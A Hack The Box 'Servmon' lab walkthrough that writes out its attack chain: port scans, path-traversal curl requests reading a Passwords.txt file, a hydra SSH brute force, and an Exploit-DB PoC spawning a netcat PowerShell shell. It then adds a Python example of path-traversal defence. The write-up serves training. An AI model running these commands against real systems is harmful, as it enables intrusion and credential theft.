Servmon
March 01, 2025
Created by: del_KZx497Ju
Page: Hack The Box
Difficulty: Easy
OS: Windows

The first step is to scan for open ports and then enumerate the versions and technologies running on them.

    nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.184 -oG scan
    /opt/extractports scan
    nmap -p21,22,80,135,139,445,5666,6063,6699,8443,49664,49665,49666,49667,49668,49669,49670 -sCV -Pn 10.10.10.184 -oN ports

In this scan I find that FTP can be enumerated with anonymous credentials.

    ftp 10.10.10.184
    anonymous:anonymous

With only the files found there I cannot do anything yet, so I keep looking at the rest of the open ports. On port 80 I find NVMS-1000 running. Searching for information about this CMS, I find a vulnerability that allows files to be read through a directory path traversal. Using this vulnerability together with the information collected from the FTP files, I manage to read a file that was referenced there and that contains possible passwords.

    curl http://10.10.10.184/../../../../../../../../Windows/System32/Drivers/etc/hosts --path-as-is
    curl http://10.10.10.184/../../../../../../../../Users/Nathan/Desktop/Passwords.txt --path-as-is

I check the passwords found against the two users I know of at this point and obtain valid credentials for one of them.

    hydra -L usernames -P passwords ssh://10.10.10.184

With these credentials I connect to the system via SSH and read the first flag.

While searching through the system files I find one that is not common: NSClient++. Searching for information about it, I find a vulnerability that allows RCE once authenticated. Looking through its files I find a password. I forward the port on which this application is listening to my machine and verify that the password is correct.

    ssh Nadine@10.10.10.184 -L 9999:127.0.0.1:8443

I try to follow the steps found to exploit this vulnerability, but I am not able to because of the inconsistent behaviour of the application.

I search for a PoC and find one on Exploit-DB. Using it I get an interactive console as NT AUTHORITY and read the second flag.

    python3 48360.txt -t 127.0.0.1 -P 9998 -p ew2XXXXXXXXXOT -c "C:\\temp\\nc64.exe 127.0.0.1 9001 -e powershell"
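The directory traversal used above works because the web application appends the request path to its document root without normalising it first; note that curl only sends the raw `../` sequences when told to with `--path-as-is`, so a server cannot rely on clients squashing them. The following is an added example, not code from the write-up or from the NVMS-1000 product, showing the naive resolver beside a hardened one that decodes, normalises and then checks that the result still lies inside the document root. The document root `/srv/nvms/www` and the sample request paths are constructed for the example.

```python
import posixpath
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Hypothetical document root for the example; not the product's real path.
WEB_ROOT = "/srv/nvms/www"


def vulnerable_resolve(web_root: str, request_path: str) -> str:
    """Naive concatenation: the request path is appended to the root as-is,
    so a run of '../' walks straight out of the directory. This is the
    class of bug exploited in the write-up; shown only for contrast."""
    return web_root + request_path


def safe_resolve(web_root: str, request_path: str) -> Optional[str]:
    """Decode, normalise, then check containment.

    Returns the resolved filesystem path, or None when the request would
    leave the web root (or uses characters the resolver refuses to handle).
    """
    decoded = unquote(request_path)
    # Refuse NUL bytes (can truncate the path in native code) and backslashes
    # (a path separator on Windows that posixpath would otherwise ignore).
    if "\x00" in decoded or "\\" in decoded:
        return None
    # Strip leading slashes so the request is joined as a path relative
    # to the root rather than replacing it.
    relative = decoded.lstrip("/")
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, relative))
    # Containment check: the result must be the root itself or sit below it.
    # Comparing against root + "/" also rejects siblings such as /srv/nvms/www2.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed request paths: two legitimate ones, the traversal shape used in
# the write-up, and a URL-encoded variant of the same idea.
SAMPLE_REQUESTS = [
    "/index.html",
    "/css/../index.html",
    "/../../../../../../../../Windows/System32/Drivers/etc/hosts",
    "/%2e%2e/%2e%2e/etc/passwd",
]


def audit_requests(requests: List[str]) -> List[Tuple[str, str]]:
    """Run each request through the hardened resolver and label the outcome."""
    results = []
    for path in requests:
        verdict = "allowed" if safe_resolve(WEB_ROOT, path) is not None else "blocked"
        results.append((path, verdict))
    return results


if __name__ == "__main__":
    for path, verdict in audit_requests(SAMPLE_REQUESTS):
        print(f"{verdict:8} {path}")
        print(f"         naive resolver would open: {vulnerable_resolve(WEB_ROOT, path)}")
```

The important detail is the order of operations: decode first, normalise second, compare last. Checking for the literal string `../` before decoding misses `%2e%2e`, and normalising before decoding misses the same thing; the containment check on the final path catches both. On the real target, which is Windows, a resolver would additionally have to treat `\` as a separator, which is why the example rejects it outright rather than trying to normalise it.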